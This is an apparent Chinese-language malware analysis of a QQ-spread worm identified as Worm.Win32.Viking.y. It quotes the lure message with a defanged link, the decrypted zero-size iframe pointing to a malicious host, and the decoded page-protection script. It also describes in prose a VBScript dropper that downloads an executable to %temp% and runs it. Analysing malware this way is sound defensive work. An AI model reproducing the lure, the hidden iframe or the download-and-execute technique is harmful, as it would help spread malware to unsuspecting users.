学步园

QQ自动发送的信息为：
/-------
看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了?
hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387***384/
-------/

点击该链接打开的网页首部有用自定义函数 psw（）加密的JavaScript脚本代码。解密后为

/-------
＜iframe src＝hxxp://web**4.3***9com.org/m**s/mm***.htm width＝0 height＝0＞＜/iframe＞
-------/

mm***.htm 　　的开头为 HTMLShip 加密的脚本程序，分为两个部分：
 
前一部分　解密后的代码为JavaScript编写，如下：
/-------
＜script language＝javascript＞yS6＝5633;if（document.all）{function _dm（）{return false};function _mdm（）{document.oncontextmenu＝_dm;setTimeout（"_mdm（）",800）};_mdm（）;}document.oncontextmenu＝new Function（"return false"）;function _ndm（e）{if（document.layers||window.sidebar）{if（e.which!＝1）return false;}};if（document.layers）{document.captureEvents（Event.MOUSEDOWN）;document.onmousedown＝_ndm;}else{document.onmouseup＝_ndm;};oK74＝3345;dI39＝7346;function _dws（）{window.status ＝ "The page is protected by HTMLShip XP";setTimeout（"_dws（）",100）;};_dws（）;kY53＝6773;jQ9＝4206;function _dds（）{if（document.all）{document.onselectstart＝function （）{return false};setTimeout（"_dds（）",700）}};_dds（）;iD69＝5348;kH81＝489;aS87＝3348;mY34＝4488;lL93＝5630;bI58＝9632;sT64＝2490;;_licensed_to_＝"TEAM";＜/script＞
-------/

后一部分　使用的是VBScript，其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web**4.3***9com.org/m**s/mm***4.exe 保存为 %temp%/g0ld.com，并利用Shell.Application 对象 的 ShellExecute 方法来运行。

Kaspersky 报为 Worm.Win32.Viking.y（http://www.viruslist.com/en/find?words=Worm.Win32.Viking.y）
瑞星报为 Worm.Viking.cx。